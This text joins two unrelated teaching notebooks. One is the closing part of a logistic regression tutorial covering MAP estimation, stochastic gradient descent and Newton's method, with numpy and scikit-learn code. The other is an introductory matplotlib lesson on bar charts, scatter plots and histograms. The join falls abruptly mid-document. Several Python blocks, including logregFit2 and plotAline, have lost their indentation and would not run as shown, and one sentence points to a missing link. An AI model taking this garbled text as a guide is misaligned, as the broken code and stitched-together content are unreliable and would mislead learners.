$$\nabla_{\bf w}\left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|^2\right\}
= - {\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right) + \frac{2}{C}{\bf w},
$$
we obtain the following gradient descent rule for MAP estimation
\begin{align}
{\bf w}_{n+1} &= \left(1-\frac{2\rho_n}{C}\right){\bf w}_n
+ \rho_n {\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
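Note that the MAP rule is the ML gradient descent rule with an extra weight-decay factor $(1-2\rho_n/C)$ that shrinks the weights at every step. The sketch below implements it; `logregFitMAP` is a hypothetical helper name (not from the notebook) and the data are a toy example. Taking $C \to \infty$ recovers the ML update, so the MAP weights should have smaller norm:

```python
import numpy as np

def logistic(t):
    return 1.0 / (1.0 + np.exp(-t))

def logregFitMAP(Z, y, rho, n_it, C):
    # Gradient descent with the MAP (Gaussian prior) rule:
    # w <- (1 - 2*rho/C) * w + rho * Z^T (y - p)
    w = np.zeros(Z.shape[1])
    for _ in range(n_it):
        p = logistic(Z @ w)
        w = (1.0 - 2.0 * rho / C) * w + rho * Z.T @ (y - p)
    return w

rng = np.random.default_rng(2)
Z = np.c_[np.ones(40), rng.normal(size=(40, 2))]          # toy design matrix
y = (Z[:, 1] + 0.3 * rng.normal(size=40) > 0).astype(float)

w_map = logregFitMAP(Z, y, rho=0.05, n_it=500, C=1.0)     # strong prior
w_ml  = logregFitMAP(Z, y, rho=0.05, n_it=500, C=1e12)    # C -> inf: (almost) ML
assert np.linalg.norm(w_map) < np.linalg.norm(w_ml)       # the prior shrinks w
```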
### 4.2 MAP estimation with Laplacian prior
If we assume that ${\bf W}$ follows a multivariate zero-mean Laplacian distribution given by
$$
p_{\bf W}({\bf w}) = \frac{1}{(2 C)^{N}} \exp\left(-\frac{1}{C}\|{\bf w}\|_1\right)
$$
(where $\|{\bf w}\|_1=|w_1|+\ldots+|w_N|$ is the $L_1$ norm of ${\bf w}$), the MAP estimate becomes
\begin{align}
\hat{\bf w}_{\text{MAP}}
&= \arg\min_{\bf w} \left\{\text{NLL}({\bf w}) + \frac{1}{C}\|{\bf w}\|_1
\right\}
\end{align}
The additional term introduced by the prior in the optimization objective is usually named the *regularization term*. It is usually very effective at avoiding overfitting when the dimension of the weight vector is high. Parameter $C$ is named the *inverse regularization strength*.
**Exercise 7**: Derive the gradient descent rules for MAP estimation of the logistic regression weights with Laplacian prior.
## 5. Other optimization algorithms
### 5.1. Stochastic Gradient descent.
Stochastic gradient descent (SGD) is based on the idea of using a single sample at each iteration of the learning algorithm. The SGD rule for ML logistic regression is
\begin{align}
{\bf w}_{n+1} &= {\bf w}_n
+ \rho_n {\bf z}^{(n)} \left(y^{(n)}-\hat{p}^{(n)}_n\right)
\end{align}
where $\hat{p}^{(n)}_n = g\left({\bf w}_n^\intercal {\bf z}^{(n)}\right)$. Once all samples in the training set have been applied, the algorithm can continue by sweeping over the training set several times (each full sweep is usually called an *epoch*).
The computational cost of each iteration of SGD is much smaller than that of gradient descent, though it usually needs many more iterations to converge.
**Exercise 8**: Modify logregFit to implement an algorithm that applies the SGD rule.
### 5.2. Newton's method
Assume that the function to be minimized, $C({\bf w})$, can be approximated by its second order Taylor series expansion around ${\bf w}_0$
$$
C({\bf w}) \approx C({\bf w}_0)
+ \nabla_{\bf w}^\top C({\bf w}_0)({\bf w}-{\bf w}_0)
+ \frac{1}{2}({\bf w}-{\bf w}_0)^\top{\bf H}({\bf w}_0)({\bf w}-{\bf w}_0)
$$
where ${\bf H}({\bf w}_0)$ is the <a href=https://en.wikipedia.org/wiki/Hessian_matrix> *Hessian* matrix</a> of $C$ at ${\bf w}_0$. Taking the gradient of this approximation with respect to ${\bf w}$, and setting the result to ${\bf 0}$, the minimum of $C$ around ${\bf w}_0$ can be approximated as
$$
{\bf w}^* = {\bf w}_0 - {\bf H}({\bf w}_0)^{-1} \nabla_{\bf w} C({\bf w}_0)
$$
Since the second order polynomial is only an approximation to $C$, ${\bf w}^*$ is only an approximation to the optimal weight vector, but we can expect ${\bf w}^*$ to be closer to the minimizer of $C$ than ${\bf w}_0$. Thus, we can repeat the process, computing a second order approximation around ${\bf w}^*$ and a new approximation to the minimizer.
<a href=https://en.wikipedia.org/wiki/Newton%27s_method_in_optimization> Newton's method</a> is based on this idea. At each optimization step, the function to be minimized is approximated by its second order Taylor series expansion around the current estimate. As a result, the learning rule becomes
$$\hat{\bf w}_{n+1} = \hat{\bf w}_{n} - \rho_n {\bf H}(\hat{\bf w}_{n})^{-1} \nabla_{{\bf w}}C(\hat{\bf w}_{n})
$$
For instance, for the MAP estimate with Gaussian prior, the *Hessian* matrix becomes
$$
{\bf H}({\bf w})
= \frac{2}{C}{\bf I} + \sum_{k=0}^{K-1} g({\bf w}^\top {\bf z}^{(k)}) \left[1-g({\bf w}^\top {\bf z}^{(k)})\right]{\bf z}^{(k)} ({\bf z}^{(k)})^\top
$$
Defining diagonal matrix
$$
{\mathbf S}({\bf w}) = \text{diag}\left[g({\bf w}^\top {\bf z}^{(k)}) \left(1-g({\bf w}^\top {\bf z}^{(k)})\right)\right]
$$
the Hessian matrix can be written in more compact form as
$$
{\bf H}({\bf w})
= \frac{2}{C}{\bf I} + {\bf Z}^\top {\bf S}({\bf w}) {\bf Z}
$$
Therefore, Newton's algorithm for logistic regression becomes
\begin{align}
{\bf w}_{n+1} = {\bf w}_{n} +
\rho_n
\left(\frac{2}{C}{\bf I} + {\bf Z}^\top {\bf S}({\bf w}_{n})
{\bf Z}
\right)^{-1}
{\bf Z}^\top \left({\bf y}-\hat{\bf p}_n\right)
\end{align}
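The compact form of the Hessian can be verified against the sum form numerically. A quick sketch with toy data (assuming numpy; `logistic` restated for self-containment):

```python
import numpy as np

def logistic(t):
    return 1.0 / (1.0 + np.exp(-t))

rng = np.random.default_rng(3)
K, dim = 10, 3
Z = rng.normal(size=(K, dim))     # rows are z^(k)
w = rng.normal(size=dim)
C = 100.0

# Sum form of the Hessian
H_sum = (2.0 / C) * np.eye(dim)
for k in range(K):
    gk = logistic(w @ Z[k])
    H_sum += gk * (1 - gk) * np.outer(Z[k], Z[k])

# Compact form: (2/C) I + Z^T S Z, with S diagonal
g = logistic(Z @ w)
S = np.diag(g * (1 - g))
H_mat = (2.0 / C) * np.eye(dim) + Z.T @ S @ Z
assert np.allclose(H_sum, H_mat)
```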
Some variants of the Newton method are implemented in the <a href="http://scikit-learn.org/stable/"> Scikit-learn </a> package.
```
def logregFit2(Z_tr, Y_tr, rho, n_it, C=1e4):
# Compute Z's
r = 2.0/C
n_dim = Z_tr.shape[1]
# Initialize variables
nll_tr = np.zeros(n_it)
pe_tr = np.zeros(n_it)
w = np.random.randn(n_dim,1)
# Running the gradient descent algorithm
for n in range(n_it):
p_tr = logistic(np.dot(Z_tr, w))
sk = np.multiply(p_tr, 1-p_tr)
S = np.diag(np.ravel(sk.T))
# Compute negative log-likelihood
nll_tr[n] = - np.dot(Y_tr.T, np.log(p_tr)) - np.dot((1-Y_tr).T, np.log(1-p_tr))
# Update weights
invH = np.linalg.inv(r*np.identity(n_dim) + np.dot(Z_tr.T, np.dot(S, Z_tr)))
w += rho*np.dot(invH, np.dot(Z_tr.T, Y_tr - p_tr))
return w, nll_tr
# Parameters of the algorithms
rho = float(1)/50 # Learning step
n_it = 500 # Number of iterations
C = 1000
g = 4
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(X_tr)
# Normalize columns (this is useful to make algorithms more stable).
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.transform(X_tst)
Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Convert target arrays to column vectors
Y_tr2 = Y_tr[np.newaxis].T
Y_tst2 = Y_tst[np.newaxis].T
# Running the gradient descent algorithm
w, nll_tr = logregFit2(Z_tr, Y_tr2, rho, n_it, C)
# Classify training and test data
p_tr, D_tr = logregPredict(Z_tr, w)
p_tst, D_tst = logregPredict(Z_tst, w)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
# NLL plot.
plt.plot(range(n_it), nll_tr,'b.:', label='Train')
plt.xlabel('Iteration')
plt.ylabel('Negative Log-Likelihood')
plt.legend()
print('The final error rates are:')
print('- Training:', str(pe_tr))
print('- Test:', str(pe_tst))
print('The NLL after training is:', str(nll_tr[len(nll_tr)-1]))
```
## 6. Logistic regression in Scikit Learn.
The <a href="http://scikit-learn.org/stable/"> scikit-learn </a> package includes an efficient implementation of <a href="http://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LogisticRegression.html#sklearn.linear_model.LogisticRegression"> logistic regression</a>. To use it, we must first create a classifier object, specifying the parameters of the logistic regression algorithm.
```
from sklearn import linear_model
from sklearn.preprocessing import PolynomialFeatures

# Create a logistic regression object.
LogReg = linear_model.LogisticRegression(C=1.0)
# Compute Z_tr
poly = PolynomialFeatures(degree=g)
Z_tr = poly.fit_transform(Xn_tr)
# Normalize columns (this is useful to make algorithms more stable).
Zn, mz, sz = normalize(Z_tr[:,1:])
Z_tr = np.concatenate((np.ones((n_tr,1)), Zn), axis=1)
# Compute Z_tst
Z_tst = poly.transform(Xn_tst)
Zn, mz, sz = normalize(Z_tst[:,1:], mz, sz)
Z_tst = np.concatenate((np.ones((n_tst,1)), Zn), axis=1)
# Fit model to data.
LogReg.fit(Z_tr, Y_tr)
# Classify training and test data
D_tr = LogReg.predict(Z_tr)
D_tst = LogReg.predict(Z_tst)
# Compute error rates
E_tr = D_tr!=Y_tr
E_tst = D_tst!=Y_tst
# Error rates
pe_tr = float(sum(E_tr)) / n_tr
pe_tst = float(sum(E_tst)) / n_tst
print('The final error rates are:')
print('- Training:', str(pe_tr))
print('- Test:', str(pe_tst))
# Compute Z_grid
Z_grid = poly.transform(X_grid)
n_grid = Z_grid.shape[0]
Zn, mz, sz = normalize(Z_grid[:,1:], mz, sz)
Z_grid = np.concatenate((np.ones((n_grid,1)), Zn), axis=1)
# Compute the classifier output for all samples in the grid.
dd = LogReg.predict(Z_grid)
pp = LogReg.predict_proba(Z_grid)[:,1]
pp = pp.reshape(xx.shape)
# Paint output maps
pylab.rcParams['figure.figsize'] = 6, 6 # Set figure size
plt.plot(x0c0, x1c0,'r.', label=labels[c0])
plt.plot(x0c1, x1c1,'g+', label=labels[c1])
plt.xlabel('$x_' + str(ind[0]) + '$')
plt.ylabel('$x_' + str(ind[1]) + '$')
plt.axis('equal')
CS = plt.contourf(xx, yy, pp, cmap=plt.cm.copper)
plt.legend(loc='best')
plt.contour(xx, yy, pp, levels=[0.5],
colors='b', linewidths=(3,))
plt.colorbar(CS, ticks=[0, 0.5, 1])
plt.show()
```
<div class="alert alert-block alert-info">
<b><h1>ENGR 1330 Computational Thinking with Data Science </h1></b>
</div>
Copyright © 2021 Theodore G. Cleveland and Farhang Forghanparast
Last GitHub Commit Date:
# 15: The `matplotlib` package
- explore different types of plots
- user defined functions for specific plotting
---
## Objectives
- Demonstrate common plot types and their uses
- Define how to plot experimental data (observations) and theoretical data (model)
1. Marker conventions
2. Line conventions
3. Legends
---
### About `matplotlib`
Quoting from: https://matplotlib.org/tutorials/introductory/pyplot.html#sphx-glr-tutorials-introductory-pyplot-py
`matplotlib.pyplot` is a collection of functions that make matplotlib work like MATLAB. Each pyplot function makes some change to a figure: e.g., creates a figure, creates a plotting area in a figure, plots some lines in a plotting area, decorates the plot with labels, etc.
In `matplotlib.pyplot` various states are preserved across function calls, so that it keeps track of things like the current figure and plotting area, and the plotting functions are directed to the current axes (please note that "axes" here and in most places in the documentation refers to the axes part of a figure and not the strict mathematical term for more than one axis).
**Computational thinking (CT)** concepts involved are:
- `Decomposition` : Break a problem down into smaller pieces; separating plotting from other parts of analysis simplifies maintenance of scripts
- `Abstraction` : Pulling out specific differences to make one solution work for multiple problems; wrappers around generic plot calls enhances reuse
- `Algorithms` : A list of steps that you can follow to finish a task; often the last step, and an important one: professional graphics help justify the expense (of paying you to do engineering) to the client.
## Background
Data are not always numerical.
Data can be music (audio files), places on a map (georeferenced attribute files), or images (various image file formats, e.g. .png, .jpeg).
Data can also be categorical: categories into which you can place individuals:
- The individuals are cartons of ice-cream, and the category is the flavor in the carton
- The individuals are professional basketball players, and the category is the player's team.
---
### Line Charts
A line chart or line plot or line graph or curve chart is a type of chart which displays information as a series of data points called 'markers' connected by straight line segments.
It is a basic type of chart common in many fields. It is similar to a scatter plot (below) except that the measurement points are **ordered** (typically by their x-axis value) and joined with straight line segments.
A line chart is often used to visualize a trend in data over intervals of time – a time series – thus the line is often drawn chronologically.
The x-axis spacing is sometimes tricky, hence line charts can unintentionally deceive - so be careful that it is the appropriate chart for your application.
We examined line charts in the prior lesson, so lets move on to other useful charts.
---
### Bar Graphs
Bar charts (graphs) are good display tools to graphically represent categorical information.
The bars are evenly spaced and of constant width.
The height/length of each bar is proportional to the `relative frequency` of the corresponding category.
`Relative frequency` is the ratio of how many things in the category to how many things in the whole collection.
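Relative frequencies are easy to compute directly; here is a quick illustration using the carton counts from the example below:

```python
# Relative frequency of each flavor = count in category / total count
ice_cream = {'Chocolate': 16, 'Strawberry': 5, 'Vanilla': 9}
total = sum(ice_cream.values())                      # 30 cartons in all
rel_freq = {k: v / total for k, v in ice_cream.items()}
assert abs(sum(rel_freq.values()) - 1.0) < 1e-12     # frequencies sum to 1
assert rel_freq['Strawberry'] == 5 / 30
```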
The example below uses `matplotlib` to create a bar plot for the ice cream analogy; the example is adapted from one at https://www.geeksforgeeks.org/bar-plot-in-matplotlib/
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
myfigure = matplotlib.pyplot.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Build the plot
matplotlib.pyplot.bar(flavors, cartons, color ='teal', width = 0.4)
matplotlib.pyplot.xlabel("Flavors")
matplotlib.pyplot.ylabel("No. of Cartons in Stock")
matplotlib.pyplot.title("Current Ice Cream in Storage")
matplotlib.pyplot.show()
```
---
Let's tidy up the script so it is more understandable; a small change in the import statement makes the script simpler to read (for humans) - also changed the bar colors just 'cause!
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Build the plot
plt.bar(flavors, cartons, color ='lightblue', width = 0.4)
plt.xlabel("Flavors")
plt.ylabel("No. of Cartons in Stock")
plt.title("Current Ice Cream in Storage")
plt.show()
```
---
Now let's deconstruct the script a bit:
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
```
This part of the code creates a dictionary object, keys are the flavors, values are the carton counts (not the best way, but good for our learning needs). Next we import the python plotting library from `matplotlib` and name it **plt** to keep the script a bit easier to read.
Next we use the list method to create two lists from the dictionary, **flavors** and **cartons**. Keep this in mind plotting is usually done on lists, so we need to prepare the structures properly.
The next statement
```
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
```
This uses the figure class in **pyplot** from **matplotlib** to make a figure object named **myfigure**; the plot is built into this object. Every call to a method in `plt` adds content to `myfigure` until we send the instruction to render the plot (`plt.show()`).
The next portion of the script builds the plot:
```
plt.bar(flavors, cartons, color ='orange', width = 0.4) # Build a bar chart, plot series flavor on x-axis, plot series carton on y-axis. Make the bars orange, set bar width (units unspecified)
plt.xlabel("Flavors") # Label the x-axis as Flavors
plt.ylabel("No. of Cartons in Stock") # Label the y-axis
plt.title("Current Ice Cream in Storage") # Title for the whole plot
```
This last statement renders the plot to the graphics device (probably localhost in the web browser)
```
plt.show()
```
---
Now let's add another set of categories to the plot and see what happens
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
eaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
animals = list(eaters.keys())
beasts = list(eaters.values())
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Build the plot
plt.bar(flavors, cartons, color ='orange', width = 0.4)
plt.bar(animals, beasts, color ='green', width = 0.4)
plt.xlabel("Flavors")
plt.ylabel("Counts: Cartons and Beasts")
plt.title("Current Ice Cream in Storage")
plt.show()
```
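In the overlay above, each series simply draws at its own category positions. If the goal is two series over the *same* categories, a common approach is to shift the bar positions so the series sit side by side. This is a minimal sketch using made-up counts for two hypothetical years (not part of the lesson data):

```python
import numpy as np
import matplotlib.pyplot as plt

flavors = ['Chocolate', 'Strawberry', 'Vanilla']
cartons_2023 = [16, 5, 9]    # hypothetical counts, year one
cartons_2024 = [12, 8, 11]   # hypothetical counts, year two

x = np.arange(len(flavors))  # numeric category positions 0, 1, 2
width = 0.4                  # bar width in x-axis units

plt.figure(figsize=(10, 5))
plt.bar(x - width / 2, cartons_2023, width=width, color='orange', label='2023')
plt.bar(x + width / 2, cartons_2024, width=width, color='green', label='2024')
plt.xticks(x, flavors)       # put the flavor names back on the axis
plt.ylabel("No. of Cartons in Stock")
plt.title("Ice Cream in Storage by Year")
plt.legend()
plt.show()
```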
---
Now suppose we want horizontal bars; we can search pyplot for such a thing. Typing "horizontal bar chart" into the pyplot search engine gives a link that leads to:

which has the right look! If we examine that script, there is a method called `barh`, so let's try that.
```{note}
Use the search engines to find out things you need to accomplish a task.
```
```
ice_cream = {'Chocolate':16, 'Strawberry':5, 'Vanilla':9} # build a data model
eaters = {'Cats':6, 'Dogs':5, 'Ferrets':19} # build a data model
import matplotlib.pyplot as plt # the python plotting library
flavors = list(ice_cream.keys()) # make a list object based on flavors
cartons = list(ice_cream.values()) # make a list object based on carton count -- assumes 1:1 association!
animals = list(eaters.keys())
beasts = list(eaters.values())
myfigure = plt.figure(figsize = (10,5)) # generate a object from the figure class, set aspect ratio
# Build the plot
plt.barh(flavors, cartons, color ='orange')
plt.barh(animals, beasts, color ='green')
plt.xlabel("Counts: Cartons and Beasts") # with barh the values are on the x-axis
plt.ylabel("Flavors and Animals")        # and the categories are on the y-axis
plt.title("Current Ice Cream in Storage")
plt.show()
```
---
Now, using pandas, we can build bar charts a bit more easily.
```
import pandas as pd
my_data = {
"Flavor": ['Chocolate', 'Strawberry', 'Vanilla'],
"Number of Cartons": [16, 5, 9]
}
df = pd.DataFrame(my_data)
df.head()
df.plot.bar(x='Flavor', y='Number of Cartons', color='magenta' )
df.plot.bar(x='Flavor', y='Number of Cartons', color="red", rot=0) # rotate the category labels back to horizontal
import numpy as np
import matplotlib.pyplot as plt
# creating the dataset
data = {'C':20, 'C++':15, 'Java':30,
'Python':35}
courses = list(data.keys())
values = list(data.values())
fig = plt.figure(figsize = (10, 5))
# creating the bar plot
plt.bar(courses, values, color ='maroon',
width = 0.4)
plt.xlabel("Courses offered")
plt.ylabel("No. of students enrolled")
plt.title("Students enrolled in different courses")
plt.show()
```
---
### Scatter Plots
A scatter plot (also called a scatterplot, scatter graph, scatter chart, scattergram, or scatter diagram) is a type of plot or mathematical diagram using Cartesian coordinates to display values for typically two variables for a set of data. If the points are coded (color/shape/size), one additional variable can be displayed. The data are displayed as a collection of points, each having the value of one variable determining the position on the horizontal axis and the value of the other variable determining the position on the vertical axis.
A scatter plot can be used either when one continuous variable that is under the control of the experimenter and the other depends on it or when both continuous variables are independent. If a parameter exists that is systematically incremented and/or decremented by the other, it is called the control parameter or independent variable and is customarily plotted along the horizontal axis. The measured or dependent variable is customarily plotted along the vertical axis. If no dependent variable exists, either type of variable can be plotted on either axis and a scatter plot will illustrate only the degree of correlation (not causation) between two variables.
A scatter plot can suggest various kinds of correlations between variables with a certain confidence interval. For example, with weight and height, weight would be on the y-axis and height on the x-axis.
Correlations may be positive (rising), negative (falling), or null (uncorrelated).
If the pattern of dots slopes from lower left to upper right, it indicates a positive correlation between the variables being studied.
If the pattern of dots slopes from upper left to lower right, it indicates a negative correlation.
A line of best fit (alternatively called 'trendline') can be drawn in order to study the relationship between the variables. An equation for the correlation between the variables can be determined by established best-fit procedures. For a linear correlation, the best-fit procedure is known as linear regression and is guaranteed to generate a correct solution in a finite time. No universal best-fit procedure is guaranteed to generate a solution for arbitrary relationships.
A scatter plot is also very useful when we wish to see how two comparable data sets agree and to show nonlinear relationships between variables.
Furthermore, if the data are represented by a mixture model of simple relationships, these relationships will be visually evident as superimposed patterns.
Scatter charts can be built in the form of bubble, marker, or/and line charts.
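The trendline and correlation ideas above can be sketched with `numpy`; the x and y values here are made up for illustration (roughly y = 2x):

```python
import numpy as np

x = np.array([1.0, 2.0, 3.0, 4.0, 5.0])
y = np.array([2.1, 3.9, 6.2, 8.0, 9.9])     # rises with x, so expect r near +1

slope, intercept = np.polyfit(x, y, deg=1)  # least-squares (linear regression) fit
r = np.corrcoef(x, y)[0, 1]                 # Pearson correlation coefficient

print(slope, intercept, r)                  # positive slope, r close to +1
# the fitted trendline is then: y_fit = slope * x + intercept
```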
Much of the above is verbatim/adapted from: https://en.wikipedia.org/wiki/Scatter_plot
The example below uses a database table from [galton_subset.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/galton_subset.csv)
```
# Example 1. A data file containing heights of fathers, mothers, and sons is to be examined
import pandas as pd                 # needed if not already imported above
import matplotlib.pyplot as plt     # needed for the scatter plots below
df = pd.read_csv('galton_subset.csv')
df['child']= df['son'] ; df.drop('son', axis=1, inplace = True) # rename son to child - got to imagine there are some daughters
df.head()
# build some lists
daddy = df['father'] ; mommy = df['mother'] ; baby = df['child']
myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class
plt.scatter(baby, daddy, c='red') # basic scatter plot
plt.show()
# Looks lousy, needs some labels
myfamily = plt.figure(figsize = (10, 10)) # build a square drawing canvass from figure class
plt.scatter(baby, daddy, c='red' , label='Father') # one plot series
plt.scatter(baby, mommy, c='blue', label='Mother') # two plot series
plt.xlabel("Child's height")
plt.ylabel("Parents' height")
plt.legend()
plt.show() # render the two plots
# Repeat in pandas - The dataframe already is built
df.plot.scatter(x="child", y="father")
ax = df.plot.scatter(x="child", y="father", c="red", label='Father')
df.plot.scatter(x="child", y="mother", c="blue", label='Mother', ax=ax)
ax.set_xlabel("Child's height")
ax.set_ylabel("Parents' Height")
```
---
### Histograms
Quoting from https://en.wikipedia.org/wiki/Histogram
"A histogram is an approximate representation of the distribution of numerical data. It was first introduced by Karl Pearson.[1] To construct a histogram, the first step is to "bin" (or "bucket") the range of values—that is, divide the entire range of values into a series of intervals—and then count how many values fall into each interval. The bins are usually specified as consecutive, non-overlapping intervals of a variable. The bins (intervals) must be adjacent, and are often (but not required to be) of equal size.
If the bins are of equal size, a rectangle is erected over the bin with height proportional to the frequency—the number of cases in each bin. A histogram may also be normalized to display "relative" frequencies. It then shows the proportion of cases that fall into each of several categories, with the sum of the heights equaling 1.
However, bins need not be of equal width; in that case, the erected rectangle is defined to have its area proportional to the frequency of cases in the bin. The vertical axis is then not the frequency but frequency density—the number of cases per unit of the variable on the horizontal axis. Examples of variable bin width are displayed on Census bureau data below.
As the adjacent bins leave no gaps, the rectangles of a histogram touch each other to indicate that the original variable is continuous.
Histograms give a rough sense of the density of the underlying distribution of the data, and often for density estimation: estimating the probability density function of the underlying variable. The total area of a histogram used for probability density is always normalized to 1. If the length of the intervals on the x-axis are all 1, then a histogram is identical to a relative frequency plot.
A histogram can be thought of as a simplistic kernel density estimation, which uses a kernel to smooth frequencies over the bins. This yields a smoother probability density function, which will in general more accurately reflect distribution of the underlying variable. The density estimate could be plotted as an alternative to the histogram, and is usually drawn as a curve rather than a set of boxes. Histograms are nevertheless preferred in applications, when their statistical properties need to be modeled. The correlated variation of a kernel density estimate is very difficult to describe mathematically, while it is simple for a histogram where each bin varies independently.
An alternative to kernel density estimation is the average shifted histogram, which is fast to compute and gives a smooth curve estimate of the density without using kernels.
The histogram is one of the seven basic tools of quality control.
Histograms are sometimes confused with bar charts. A histogram is used for continuous data, where the bins represent ranges of data, while a bar chart is a plot of categorical variables. Some authors recommend that bar charts have gaps between the rectangles to clarify the distinction."
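The frequency vs. density distinction described above can be demonstrated with `matplotlib`'s `hist` and its `density` argument; the sample below is randomly generated, not taken from the lesson data:

```python
import numpy as np
import matplotlib.pyplot as plt

rng = np.random.default_rng(seed=1)          # seeded so the run is repeatable
sample = rng.normal(loc=0.0, scale=1.0, size=1000)

counts, edges, _ = plt.hist(sample, bins=20) # raw frequencies: counts sum to 1000
plt.clf()                                    # clear the figure for the second plot

density, edges, _ = plt.hist(sample, bins=20, density=True)  # frequency density
plt.xlabel("Value")
plt.ylabel("Density")
plt.show()

widths = np.diff(edges)                      # bin widths
print((density * widths).sum())              # total area of a density histogram is 1
```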
The example below uses a database table from [top_movies.csv](http://54.243.252.9/engr-1330-webroot/1-Lessons/Lesson12/top_movies.csv)
```
import pandas as pd
df = pd.read_csv('top_movies.csv')
df.head()
df[["Gross"]].hist()
df[["Gross"]].hist(bins=100)
df.describe()
```
## Summary
- line charts (previous lesson)
- bar charts
- scatterplots
- histograms
## References
1. Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python
(Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition.
2. Call Expressions in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/03/3/Calls.html
3. Functions and Tables in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/08/Functions_and_Tables.html
4. Visualization in "Adhikari, A. and DeNero, J. Computational and Inferential Thinking The Foundations of Data Science" https://www.inferentialthinking.com/chapters/07/Visualization.html
5. Documentation; The Python Standard Library; 9. Numeric and Mathematical Modules https://docs.python.org/2/library/math.html
6. https://matplotlib.org/gallery/lines_bars_and_markers/horizontal_barchart_distribution.html?highlight=horizontal%20bar%20chart
7. https://www.geeksforgeeks.org/bar-plot-in-matplotlib/
## Addendum (Scripts that are Interactive)
:::{note}
The addendum is intended for in-class demonstration
:::
```
# python script to illustrate plotting
# CODE BELOW IS ADAPTED FROM:
# Grus, Joel (2015-04-14). Data Science from Scratch: First Principles with Python
# (Kindle Locations 1190-1191). O'Reilly Media. Kindle Edition.
#
from matplotlib import pyplot as plt # import the plotting library from matplotlib
years = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define one list for years
gdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3] # and another one for Gross Domestic Product (GDP)
plt.plot( years, gdp, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis
# what if "^", "P", "*" for marker?
# what if "red" for color?
# what if "dashdot", '--' for linestyle?
plt.title("Nominal GDP")# add a title
plt.ylabel("Billions of $")# add a label to the x and y-axes
plt.xlabel("Year")
plt.show() # display the plot
```
Now let's put the plotting script into a function so we can make line charts of any two numeric lists
```
def plotAline(list1,list2,strx,stry,strtitle): # plot list1 on x, list2 on y, xlabel, ylabel, title
    from matplotlib import pyplot as plt # import the plotting library from matplotlib
plt.plot( list1, list2, color ='green', marker ='o', linestyle ='solid') # create a line chart, years on x-axis, gdp on y-axis
plt.title(strtitle)# add a title
plt.ylabel(stry)# add a label to the x and y-axes
plt.xlabel(strx)
plt.show() # display the plot
return #null return
# wrapper
years = [1950, 1960, 1970, 1980, 1990, 2000, 2010] # define two lists years and gdp
gdp = [300.2, 543.3, 1075.9, 2862.5, 5979.6, 10289.7, 14958.3]
print(type(years[0]))
print(type(gdp[0]))
plotAline(years,gdp,"Year","Billions of $","Nominal GDP")
```
## Example
Use the plotting script and create a function that draws a straight line between two points.
```
def Line():
    from matplotlib import pyplot as plt # import the plotting library from matplotlib
    x1 = float(input('Please enter x value for point 1: ')) # input() returns strings; convert to float
    y1 = float(input('Please enter y value for point 1: ')) # so the axes are numeric, not categorical
    x2 = float(input('Please enter x value for point 2: '))
    y2 = float(input('Please enter y value for point 2: '))
    xlist = [x1,x2]
    ylist = [y1,y2]
plt.plot( xlist, ylist, color ='orange', marker ='*', linestyle ='solid')
#plt.title(strtitle)# add a title
plt.ylabel("Y-axis")# add a label to the x and y-axes
plt.xlabel("X-axis")
plt.show() # display the plot
return #null return
```
---
## Laboratory 15
**Examine** (click) Laboratory 15 as a webpage at [Laboratory 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.html)
**Download** (right-click, save target as ...) Laboratory 15 as a jupyterlab notebook from [Laboratory 15.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15.ipynb)
<hr><hr>
## Exercise Set 15
**Examine** (click) Exercise Set 15 as a webpage at [Exercise 15.html](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.html)
**Download** (right-click, save target as ...) Exercise Set 15 as a jupyterlab notebook at [Exercise Set 15.ipynb](http://54.243.252.9/engr-1330-webroot/8-Labs/Lab15/Lab15-TH.ipynb)
